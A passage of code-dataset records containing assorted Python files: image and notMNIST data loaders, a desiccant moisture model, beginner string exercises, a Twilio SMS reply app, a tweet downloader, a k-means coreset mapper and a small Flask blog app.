cv2\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',\n]\n\ndef erosion(img, kernalSize):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,\n (kernalSize, kernalSize))\n ret,img = cv2.threshold(img,220,1,cv2.THRESH_BINARY)\n mask = cv2.erode(img, kernel, iterations=1)\n return mask\n\ndef dilation(img, kernalSize):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,\n (kernalSize, kernalSize))\n ret,img = cv2.threshold(img,220,1,cv2.THRESH_BINARY)\n mask = cv2.dilate(img, kernel, iterations=1)\n return mask\n\n# def erosion(img, radius):\n# kernel = np.ones((3, 3), np.uint8)\n# mask = cv2.dilate(img, kernel, iterations=radius//2)\n# return mask\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)\n\ndef make_dataset(dir):\n images = []\n assert os.path.isdir(dir), '%s is not a valid directory' % dir\n\n for root, _, fnames in sorted(os.walk(dir)):\n for fname in fnames:\n if is_image_file(fname):\n path = os.path.join(root, fname)\n images.append(path)\n return images\n\ndef getImage(filename):\n import cv2\n src = cv2.imread(filename,cv2.IMREAD_COLOR)\n img = src.transpose(2,0,1).astype(np.float32)/255.0\n img = Variable(torch.from_numpy(img))\n return img, src\n\nclass DataDataset(data.Dataset):\n def __init__(self, root, crop_size, train=True):\n self.data = make_dataset(root)\n self.len = len(self.data)\n self.trans = get_transform(crop_size, train=train)\n\n def __getitem__(self, index):\n filepath = self.data[index%self.len]\n #print(filepath)\n #A,idx = getImage(filepath)\n A = Image.open(filepath).convert('L')\n A = self.trans(A)\n return A\n\n # for test\n # def __getitem__(self, index):\n # filepath = self.data[index%self.len]\n # A = Image.open(filepath).convert('L')\n # # A = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE)\n # if A.size[0] >4000:\n # A = A.resize((A.size[0]//2, A.size[1]//2), Image.BICUBIC)\n # # A = cv2.resize(A, (A.shape[1]//2, A.shape[0]//2), interpolation=cv2.INTER_LINEAR)\n # Asize = A.size\n # A = self.trans(A)\n # return A, filepath, Asize\n\n def __len__(self):\n return self.len\n\n\ndef get_transform(crop_size, train=True):\n transform_list = []\n if train:\n transform_list.append(transforms.RandomCrop(crop_size))\n transform_list.append(transforms.RandomHorizontalFlip())\n transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base=2**8)))\n \n transform_list += [transforms.ToTensor(),\n transforms.Normalize((0.5, ),\n (0.5, ))]\n return transforms.Compose(transform_list)\n\n\ndef __make_power_2(img, base, method=Image.BICUBIC):\n ow, oh = img.size\n h = int(round(oh / base) * base)\n w = int(round(ow / base) * base)\n if (h == oh) and (w == ow):\n return img\n\n __print_size_warning(ow, oh, w, h)\n return img.resize((w, h), method)\n\n# just modify the width and height to be multiple of 4\ndef __adjust(img, mult):\n ow, oh = img.size\n\n # the size needs to be a multiple of this number,\n # because going through generator network may change img size\n # and eventually cause size mismatch error\n # mult = 32\n if ow % mult == 0 and oh % mult == 0:\n return img\n w = (ow - 1) // mult\n w = (w + 1) * mult\n h = (oh - 1) // mult\n h = (h + 1) * mult\n\n if ow != w or oh != h:\n __print_size_warning(ow, oh, w, h)\n\n return img.resize((w, h), Image.BICUBIC)\n\n\ndef __scale_width(img, target_width):\n ow, oh = img.size\n\n # the size needs to be a multiple of this number,\n # because going through generator network may 
change img size\n # and eventually cause size mismatch error\n mult = 32\n assert target_width % mult == 0, \"the target width needs to be multiple of %d.\" % mult\n if (ow == target_width and oh % mult == 0):\n return img\n w = target_width\n target_height = int(target_width * oh / ow)\n m = (target_height - 1) // mult\n h = (m + 1) * mult\n\n if target_height != h:\n __print_size_warning(target_width, target_height, w, h)\n\n return img.resize((w, h), Image.BICUBIC)\n\n\ndef __print_size_warning(ow, oh, w, h):\n if not hasattr(__print_size_warning, 'has_printed'):\n print(\"The image size needs to be a multiple of 4. \"\n \"The loaded image size was (%d, %d), so it was adjusted to \"\n \"(%d, %d). This adjustment will be done to all images \"\n \"whose sizes are not multiples of 4\" % (ow, oh, w, h))\n __print_size_warning.has_printed = True\n","sub_path":"vae/datasets1.py","file_name":"datasets1.py","file_ext":"py","file_size_in_byte":5088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"280649981","text":"\"\"\"\nDesiccant class\nBrent Maranzano\n2016-04-16\n\"\"\"\nimport pandas as pd\n\n\nclass Desiccant(object):\n \"\"\"\n Define the desiccant inside the container (e.g. type, amount, water...etc).\n\n Class Attributes\n ID : string - unique identification number to lookup parameters\n name : string - Desiccant material.\n mass : float - mass of desiccant (g)\n water_content : float - mass fraction of water contained in the desiccant\n (mass water (mg) / mass dry desiccant (g))\n GAB_parameters : dictionary - {Wm, C, K} GAB constants from lookup file.\n density: float - density of dry desiccant (g/cm^3)\n water : float - total mass of water (g)\n\n Class Methods\n set_properties : Set the properties of the desiccant\n refresh : Refresh the desiccant to a new water content\n equilibrate : Equilibrate the deisccant to a provided RH and set the water content.\n calc_water_content: Calculate the water content from GAB and passed water activity\n \"\"\"\n def __init__(self, ID, mass, **kwargs):\n\n self.set_properties(ID, mass, **kwargs)\n\n def set_properties(self, ID, mass, density=1.0, **kwargs):\n \"\"\"\n Set the properties of the desiccant.\n\n Parameters\n ID : string - Unique identification of the desiccant for the lookup.\n mass : float - Mass of the desiccant.\n optional kwargs\n water_content : float - mass fraction of water in desiccant\n (mass water (mg) / mass dry desiccant (g))\n density : float - density of dry desiccant (g)\n \"\"\"\n store = pd.HDFStore(\"simulation_constants.hdf\", mode=\"r\")\n GAB_constants = store[\"GAB_constants\"]\n store.close()\n\n if ID in GAB_constants.index.values:\n self.ID = ID\n self.name = GAB_constants.loc[\"material\"][\"name\"]\n self.GAB_parameters = GAB_constants.loc[ID][[\"C\", \"K\", \"Wm\"]].to_dict()\n else:\n raise ValueError(\"Desiccant type {} is not defined\".format(ID))\n\n self.mass = float(mass)\n\n if \"water_content\" in kwargs:\n self.water_content = float(kwargs[\"water_content\"])\n elif \"initial_water_activity\" in kwargs:\n self.water_content = \\\n self.calc_water_content(kwargs[\"initial_water_activity\"]) * 1.e3\n else:\n self.water_content = 20.\n\n self.density = float(density)\n\n self.water = self.water_content * self.mass * 1.e-3\n\n def refresh(self, water_content=20., initial_activity=None):\n \"\"\"\n Refresh the desiccant (e.g. replace with equivalent desiccant\n mass with lower water content). 
Specify either new water\n        content (water_content), or initial water activity of the\n        desiccant (initial_activity).\n\n        Parameters\n        water_content: float - Water content of the fresh desiccant\n            (mg water / g dry desiccant)\n        initial_activity: float - Water activity of the fresh desiccant (unitless)\n        \"\"\"\n        if initial_activity is None:\n            self.water_content = float(water_content)\n        else:\n            self.water_content = \\\n                self.calc_water_content(float(initial_activity))\n\n        self.water = self.water_content * self.mass * 1.e-3\n\n    def equilibrate(self, aw):\n        \"\"\"\n        Equilibrate the desiccant to a new water activity.\n\n        Parameters\n        aw: float - Water activity to equilibrate desiccant.\n        \"\"\"\n        self.water_content = self.calc_water_content(aw)\n\n        self.water = self.water_content * self.mass * 1.e-3\n\n    def calc_water_content(self, aw):\n        \"\"\"\n        Calculate the water content from the GAB parameters at the provided\n        water activity.\n\n        Parameters\n        aw : float - Water activity\n\n        return: water_content (mg water / g desiccant)\n        \"\"\"\n        aw = float(aw)\n        Wm = self.GAB_parameters[\"Wm\"]\n        C = self.GAB_parameters[\"C\"]\n        K = self.GAB_parameters[\"K\"]\n        water_content = (Wm*C*K*aw) / ((1-K*aw) * (1-K*aw+C*K*aw)) * 1.e3\n        return water_content\n","sub_path":"server/package/desiccant.py","file_name":"desiccant.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"87404538","text":"'''\r\nMIT6001 edX - week1 problem set.\r\n\r\nHangman game.\r\n\r\nLast Updated: 2016-Oct-24\r\nFirst Created: 2016-Oct-24\r\nPython 3.5\r\nChris\r\n'''\r\n\r\ndef q1():\r\n    # Paste your code into this box\r\n    vowels = ['a', 'e', 'i', 'o', 'u']\r\n    s = 'azcbobobegghakl'  # sample input (the grading environment normally supplies s)\r\n    count = len([letter for letter in s if letter in vowels])\r\n    print('Number of vowels: %d' % (count))\r\n\r\ndef q2():\r\n    s = 'azcbobobegghakl'\r\n    count = len([x for x in range(len(s)) if s[x:x+3] == 'bob'])\r\n    print('Number of times bob occurs is: %d' % (count))\r\n\r\ndef q3():\r\n    s = 'azcbobobegghakl'\r\n    #s = 'abcbcd'\r\n\r\n    best_string = ''\r\n\r\n    for x_let in range(len(s) - 1):\r\n        new_string = s[x_let]\r\n        while (x_let < len(s) - 1) and s[x_let] <= s[x_let + 1]:\r\n            new_string += s[x_let + 1]\r\n            x_let += 1\r\n        if len(new_string) > len(best_string):\r\n            best_string = new_string\r\n\r\n    print('Longest substring in alphabetical order is: %s' % (best_string))\r\n","sub_path":"6001/mit6001_week1.py","file_name":"mit6001_week1.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"97641981","text":"import numpy as np\n\n\nclass NotMNIST:\n    def __init__(self):\n        trainData, self.trainTarget, validData, self.validTarget, testData, self.testTarget = self.load_data()\n        self.trainData = np.reshape(trainData, (trainData.shape[0], 784))\n        self.validData = np.reshape(validData, (validData.shape[0], 784))\n        self.testData = np.reshape(testData, (testData.shape[0], 784))\n\n        print(\"train data dims\", self.trainData.shape, \"train labels dims\", self.trainTarget.shape)\n        print(\"eval data dims\", self.validData.shape, \"eval labels dims\", self.validTarget.shape)\n        print(\"test data dims\", self.testData.shape, \"test labels dims\", self.testTarget.shape)\n\n    def load_data(self):\n        with np.load(\"notMNIST.npz\") as data:\n            Data, Target = data[\"images\"], data[\"labels\"]\n            np.random.seed(521)\n            randIndx = np.arange(len(Data))\n            np.random.shuffle(randIndx)\n            Data = 
Data[randIndx]/255.\n            Target = Target[randIndx]\n            trainData, trainTarget = Data[:15000], Target[:15000]\n            validData, validTarget = Data[15000:16000], Target[15000:16000]\n            testData, testTarget = Data[16000:], Target[16000:]\n        return trainData, trainTarget, validData, validTarget, testData, testTarget\n","sub_path":"ECE521_Inference_Algorithms_and_Machine_Learning/assignment3/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"7048406","text":"import os\nimport random\nfrom twilio.rest import Client\nfrom flask import Flask, request, redirect\nfrom twilio.twiml.messaging_response import MessagingResponse\n\napp = Flask(__name__)\n\n@app.route(\"/sms\", methods=['GET', 'POST'])\ndef sms_reply():\n    \"\"\"Respond to incoming calls with a simple text message.\"\"\"\n    body = request.values.get('Body', None)\n    frm = request.values.get('From', None)\n    resp = MessagingResponse()\n\n    # Message Logic \n    seen_it = set()\n    with open('assets/response.log','r+') as res:\n        for line in res:\n            seen_it.add(line.split(' says ')[0])\n\n    with open('assets/response.log','a+') as res:\n        res.write(frm + \" says \" + body + '\\n')\n\n    # 1st Reply Message\n    if frm not in seen_it:\n        resp.message(\"May the new decade find you great happiness and prosperity.\")\n    else: # Subsequent Reply Messages\n        emoji = ['🎉','🎊','🥂','🌃','🎆','🎈','🥳']\n        resp.message(emoji[random.randint(0,len(emoji)-1)])\n\n    return str(resp)\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n\n","sub_path":"response_server.py","file_name":"response_server.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"627530737","text":"import tweepy\r\nimport csv\r\nimport datetime\r\nimport numpy as np\r\nimport pandas as pd \r\nfrom tweepy import Stream\r\nfrom tweepy import API\r\nfrom tweepy import Cursor\r\nfrom tweepy.streaming import StreamListener\r\nfrom tweepy import OAuthHandler\r\nfrom datetime import date\r\n\r\nimport twitter_credentials\r\n\r\n# # # # TWITTER AUTHENTICATOR # # # #\r\nclass TwitterAuthenticator():\r\n    \"\"\"\r\n    Class for handling authentication\r\n    \"\"\"\r\n    def authenticate_twitter_api(self):\r\n        auth = OAuthHandler(twitter_credentials.CONSUMER_KEY, twitter_credentials.CONSUMER_SECRET)\r\n        auth.set_access_token(twitter_credentials.ACCESS_TOKEN, twitter_credentials.ACCESS_TOKEN_SECRET)\r\n        return auth\r\n\r\n\r\nclass TwitterClient():\r\n    def __init__(self, twitter_user=None):\r\n        self.auth = TwitterAuthenticator().authenticate_twitter_api()\r\n        self.twitter_client = API(self.auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\r\n        self.twitter_user = twitter_user\r\n\r\n    def get_user_timeline_tweets(self, startDate=datetime.datetime(1,1,1,0,0), endDate=datetime.datetime(9999,1,1,0,0)):\r\n        tweets = []\r\n        for tweet in Cursor(self.twitter_client.user_timeline, id=self.twitter_user, tweet_mode='extended').items():\r\n            if (not tweet.retweeted) and ('RT' not in tweet.full_text) and (tweet.created_at < endDate) and (tweet.created_at > startDate):\r\n                tweets.append(tweet)\r\n        return tweets\r\n\r\nclass TweetAnalyzer():\r\n    \"\"\"\r\n    Functionality for analyzing and categorizing content from tweets\r\n    \"\"\"\r\n    def clean_text(self, text):\r\n        a = text\r\n        b = \",.!?;'&\"  # characters to process; '&' is spelled out, the rest are stripped\r\n        c = \"&\"\r\n\r\n        for char in b:\r\n            if char == c:\r\n                a = a.replace(char,\"and\")\r\n            else:\r\n                a = a.replace(char,\"\")\r\n        
return a\r\n\r\n def tweets_to_data_frame(self, tweets):\r\n df = pd.DataFrame(data=[tweet.full_text for tweet in tweets], columns=['text'])\r\n\r\n df['date'] = np.array([tweet.created_at for tweet in tweets])\r\n df['id'] = np.array([tweet.id_str for tweet in tweets])\r\n df['retweets'] = np.array([tweet.retweet_count for tweet in tweets])\r\n df['favorites'] = np.array([tweet.favorite_count for tweet in tweets])\r\n\r\n return df\r\n\r\ntweet_analyzer = TweetAnalyzer()\r\n\r\n##### Donald Trump #####\r\n# startDate = datetime.datetime(2017, 1, 20, 0, 0 ,0)\r\n# endDate = datetime.datetime(2021, 1, 1, 0, 0 ,0)\r\n# twitter_client = TwitterClient(twitter_user='POTUS')\r\n# tweets = twitter_client.get_user_timeline_tweets(startDate)\r\n# for tweet in tweets:\r\n# tweet.full_text = tweet_analyzer.clean_text(tweet.full_text)\r\n# tweets_df = tweet_analyzer.tweets_to_data_frame(tweets)\r\n# tweets_df.to_csv('potus.csv', sep='\\t', encoding='utf-8', index=False)\r\n##### Donald Trump #####\r\n\r\n##### Barack Obama #####\r\nstartDate = datetime.datetime(2009, 1, 20, 0, 0 ,0)\r\nendDate = datetime.datetime(2017, 1, 20, 0, 0 ,0)\r\ntwitter_client = TwitterClient(twitter_user='BarackObama')\r\ntweets = twitter_client.get_user_timeline_tweets(startDate,endDate)\r\nfor tweet in tweets:\r\n tweet.full_text = tweet_analyzer.clean_text(tweet.full_text)\r\ntweets_df = tweet_analyzer.tweets_to_data_frame(tweets)\r\ntweets_df.to_csv('obama.csv', sep='\\t', encoding='utf-8', index=False)\r\n##### Barack Obama #####\r\n","sub_path":"download_tweets.py","file_name":"download_tweets.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"282963329","text":"#!/usr/bin/env python2.7\nimport logging\n\nimport sys\nimport math\nimport numpy as np\nimport scipy\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\nfrom sklearn.metrics import euclidean_distances\nimport datetime\n#import good_data\n\n# 40'000: Submission 2952, score: 740.608811745 => 12 minutes\n# 55'000: Submission: 2953, score: 739.711630341 => 20 minutes\n# 65'000: Submission: 2954, score: 739.300944969 => 20 minutes\n# 65'000: Submission: 2957, score: 739.690196805 => 15 minutes, magic * 2\n# 65'000: Submission: 2958, score: 738.644914845 => 19 minutes, magic / 2\n# 75'000: Submission: 2955, score: 738.478742513 => 19 minutes\n# 85'000: Submission: 2956, score: FAILED => FAILED\n# 95'000: Submission: 2959, score: FAILED => FAILED\n#100'000: Submission: 2960, score: FAILED => FAILED\n# 80'000: Submission: 2961, score: 738.669749628 => 25 minutes\n# Submission 3609\n\n\nclass Helper:\n def __init__(self):\n pass\n\n @staticmethod\n def dist_func(center, point):\n return np.float128(euclidean_distances(center, point, squared=True))\n\n\nclass ClusterCenter():\n def __init__(self, center):\n self.center = center\n self.points = []\n self.dist_sum = None\n\n def add_point(self, point):\n self.points.append(point)\n self.dist_sum = None\n\n def dist_point_sum(self):\n if self.dist_sum is None:\n self.dist_sum = np.float128(0.0)\n for point in self:\n self.dist_sum += Helper.dist_func(self.center, point)\n return self.dist_sum\n\n def __len__(self):\n return len(self.points)\n\n def __getitem__(self, item):\n return self.points[item]\n\n def get_half_farthest_points(self):\n dist_points = [[Helper.dist_func(self.center, p), p] for p in self.points]\n sorted_dist_points = sorted(dist_points, key=lambda dist_point: dist_point[0])\n to_keep = len(self.points) / 
2\n # sorted ascending by distance, so the farthest half is the tail of the list\n return [dist_point[1] for dist_point in sorted_dist_points][to_keep:]\n\n\nclass DataPoint():\n def __init__(self, point, cluster):\n self.point = point\n self.cluster = cluster\n self.cluster.add_point(point)\n self.q = None\n self.dp_sum = None\n\n def calc_sampling_weight(self):\n if self.q is None:\n # Formula slide 33, dm-09\n center_dist_ratio = np.float128(1.0)\n if Helper.dist_func(self.cluster.center, self.point) != np.float128(0.0):\n center_dist_ratio = Helper.dist_func(self.cluster.center, self.point) / self.cluster.dist_point_sum()\n\n self.q = np.ceil((\n (np.float128(5.0) / np.float128(len(self.cluster))) +\n center_dist_ratio\n ) * np.float128(3.0)) - np.float128(2.0)\n return self.q\n\n def calc_sampling_probability(self):\n return self.calc_sampling_weight() / self.dp_sum\n\n def calc_weight(self, out_per_mapper):\n return 1.0 / self.calc_sampling_weight() / out_per_mapper\n\n\nclass Mapper:\n def __init__(self):\n total_rows_in_reducer, mappers = [8000, 15] if \"--local\" in sys.argv else [75000, 300]\n\n self.no_clusters = 200\n self.out_per_mapper = total_rows_in_reducer / mappers\n self.written = 0\n\n self.num_per_mapper = 6667\n self.avg_cluster_size = None\n self.keep_ratio = None\n\n self.cluster_centers = None\n self.cluster_center_points = None\n self.data_points = None\n\n def run(self):\n self.data = self.read_input()\n\n self.num_per_mapper = len(self.data)\n self.avg_cluster_size = np.float128(self.num_per_mapper) / np.float128(self.no_clusters)\n self.keep_ratio = np.float128(self.out_per_mapper) / np.float128(self.num_per_mapper)\n\n np.random.shuffle(self.data)\n self.cluster_center_points = self.build_coresets()\n self.cluster_centers = [ClusterCenter(c) for c in self.cluster_center_points]\n self.sample_points()\n #logging.warn(\"Written %i\" % self.written)\n #logging.warn(self.out_per_mapper)\n\n def read_input(self):\n reader = sys.stdin\n\n if \"--read_from_file\" in sys.argv:\n index = int(sys.argv[1])\n\n return np.load(\"../../../1-data/training.npz\")['arr_0'][\n ((index - 1) * self.num_per_mapper):(index * self.num_per_mapper)]\n\n arr = []\n for line in reader:\n arr.append(np.fromstring(line, dtype=np.float128, sep=' '))\n\n return np.array(arr)\n\n def write_feature(self, row, weight):\n def precise_str(x):\n return \"%.25f\" % x\n\n print(\"1\\t%f\\t%s\" % (weight, \" \".join(map(precise_str, row))))\n self.written += 1\n\n def can_write_more_features(self):\n return self.written < self.out_per_mapper\n\n def cluster_center(self, cluster_index):\n return self.cluster_centers[cluster_index]\n\n def build_coresets(self):\n # The number of elements to take into the coreset at each iteration\n # should be 10 * d * k * ln(1/epsilon) = 10 * 750 * 200 * ln(1/0.1) = HUGE!?\n # Hmm...\n # From: http://www.mit.edu/~michaf/Code/SVDCoresetAlg.m: \"Should be equal to k / epsilon^2\"\n # k / epsilon^2\n # for epsilon = 0.99: 200/(0.99)^2 = 205\n # for epsilon = 0.5: 200/(0.5)^2 = 800\n # for epsilon = 0.4: 200/(0.4)^2 = 1250\n # for epsilon = 0.3: 200/(0.3)^2 = 2223\n # for epsilon = 0.2: 200/(0.2)^2 = 5000\n # for epsilon = 0.1: 200/(0.1)^2 = 20000\n # for epsilon = 0.05: 200/(0.05)^2 = 80000\n # => to have at most 60'000 dp's at the reducer, choose at most 200 per mapper => gives an epsilon = 0.99??\n # => have to merge coresets at the reducer!\n # TODO: use higher value here, and merge coresets at reducer\n magic_constant = int(self.out_per_mapper / np.log2(len(self.data)) + 1)\n\n # self.data is shuffled already => it's ok to take the first n 
points for uniform sampling\n dat = self.data.tolist()\n coreset = []\n while len(dat) > 0:\n coreset_part = dat[0:magic_constant]\n coreset += coreset_part\n dat = np.delete(dat, range(0, min(magic_constant, len(dat))), axis=0)\n dat = self.remove_half_nearest_points(coreset_part, dat)\n return coreset\n\n def sample_points(self):\n k = KMeans(n_clusters=self.no_clusters)\n k.cluster_centers_ = np.array(self.cluster_center_points)\n assigned_clusters = k.predict(np.array(self.data))\n\n self.cluster_centers = [ClusterCenter(c) for c in self.cluster_center_points]\n self.data_points = [DataPoint(self.data[i], self.cluster_centers[assigned_clusters[i]]) for i in\n range(len(self.data))]\n\n dp_sum = np.sum([dp.calc_sampling_weight() for dp in self.data_points]) / self.out_per_mapper\n\n for dp in self.data_points:\n dp.dp_sum = dp_sum\n\n #logging.warn(\"Tot!\")\n #logging.warn(sum([dp.calc_sampling_probability() for dp in self.data_points]))\n #logging.error(len(self.data_points))\n\n while self.can_write_more_features():\n np.random.shuffle(self.data_points)\n for dp in self.data_points:\n if not self.can_write_more_features():\n return\n\n dp.dp_sum = dp_sum\n if np.random.sample() < dp.calc_sampling_probability():\n self.write_feature(dp.point, dp.calc_weight(self.out_per_mapper))\n\n def remove_half_nearest_points(self, center_points, data):\n k = KMeans(n_clusters=self.no_clusters)\n k.cluster_centers_ = np.array(center_points)\n assigned_clusters = k.predict(np.array(data))\n clusters = [ClusterCenter(c) for c in center_points]\n for i in range(0, len(assigned_clusters)):\n clusters[assigned_clusters[i]].add_point(data[i])\n\n ret = []\n for c in clusters:\n ret += c.get_half_farthest_points()\n return ret\n\n\nif __name__ == \"__main__\":\n m = Mapper()\n m.run()\n\n\n\n\n","sub_path":"gold-digger/kmeans/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":8055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"465944553","text":"from flask import Flask, redirect, render_template, url_for\nfrom models.base import init_db, create_db\nfrom routes.user import main as routes_user\nfrom routes.article import main as routes_blog\nfrom routes.api import main as routes_api\n\napp = Flask(__name__)\n\n\ndef register_routes(app):\n \"\"\"\n Import and register the blueprints inside this function\n \"\"\"\n app.register_blueprint(routes_user, url_prefix='/user')\n app.register_blueprint(routes_blog, url_prefix='/article')\n app.register_blueprint(routes_api, url_prefix='/api')\n\n\ndef configured_app():\n # Register the routes\n register_routes(app)\n # Return the configured app instance\n return app\n\n\n@app.route('/')\ndef hello_world():\n return redirect(url_for('.articles'))\n\n\n@app.route('/articles', methods=['GET'])\ndef articles():\n return render_template('article/index.html')\n\n\nif __name__ == '__main__':\n init_db()\n app = configured_app()\n config = dict(\n debug=True,\n host='',\n port=5000\n )\n app.run(**config)\n","sub_path":"blog-flask.py","file_name":"blog-flask.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
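A quick way to sanity-check the tweets_to_data_frame logic from download_tweets.py above without hitting the Twitter API is to feed it stub objects. The sketch below is not part of the original script: FakeTweet is a hypothetical stand-in for a Tweepy status object, assuming only the five attributes the method actually reads.

# Minimal sketch: tweets_to_data_frame with stubbed tweets (FakeTweet is
# hypothetical; the real script receives Tweepy status objects).
import datetime
from collections import namedtuple

import numpy as np
import pandas as pd

FakeTweet = namedtuple('FakeTweet', ['full_text', 'created_at', 'id_str', 'retweet_count', 'favorite_count'])

def tweets_to_data_frame(tweets):
    # Same column-building logic as TweetAnalyzer.tweets_to_data_frame above
    df = pd.DataFrame(data=[t.full_text for t in tweets], columns=['text'])
    df['date'] = np.array([t.created_at for t in tweets])
    df['id'] = np.array([t.id_str for t in tweets])
    df['retweets'] = np.array([t.retweet_count for t in tweets])
    df['favorites'] = np.array([t.favorite_count for t in tweets])
    return df

tweets = [
    FakeTweet('first tweet', datetime.datetime(2009, 1, 21), '1', 10, 25),
    FakeTweet('second tweet', datetime.datetime(2009, 1, 22), '2', 7, 12),
]
print(tweets_to_data_frame(tweets))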
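The importance-sampling arithmetic in DataPoint.calc_sampling_weight (the "slide 33, dm-09" formula in mapper.py above) is easier to follow with concrete numbers. This is a minimal sketch in plain floats rather than np.float128; the distances and cluster size are invented, chosen to match the mapper's defaults of roughly 6667 points spread over 200 clusters.

import numpy as np

def sampling_weight(dist_to_center, cluster_dist_sum, cluster_size):
    # Mirrors DataPoint.calc_sampling_weight: the weight grows with the point's
    # share of its cluster's total squared distance, so outliers are favored.
    ratio = 1.0
    if dist_to_center != 0.0:
        ratio = dist_to_center / cluster_dist_sum
    return np.ceil((5.0 / cluster_size + ratio) * 3.0) - 2.0

# ~33 points per cluster (6667 / 200); total squared distance 50.0 (invented).
print(sampling_weight(1.0, 50.0, 33))   # ceil(0.51...) - 2 = -1.0
print(sampling_weight(45.0, 50.0, 33))  # ceil(3.15...) - 2 =  2.0

Note that an ordinary point in a cluster of this size gets a negative q here, which the formula permits; only points carrying a large share of their cluster's distance mass come out positive, so the sign of the summed weights matters when calc_sampling_probability divides by dp_sum.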
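register_routes in blog-flask.py above mounts three blueprints under URL prefixes. The imported route modules are not shown, so the sketch below is a guess at the shape of routes/user.py, not its actual contents; it illustrates how a blueprint view composes with url_prefix='/user'.

from flask import Blueprint

# Hypothetical routes/user.py: blog-flask.py imports `main` from this module.
main = Blueprint('user', __name__)

@main.route('/login')
def login():
    # Mounted via app.register_blueprint(main, url_prefix='/user'),
    # so this view answers GET /user/login.
    return 'login page'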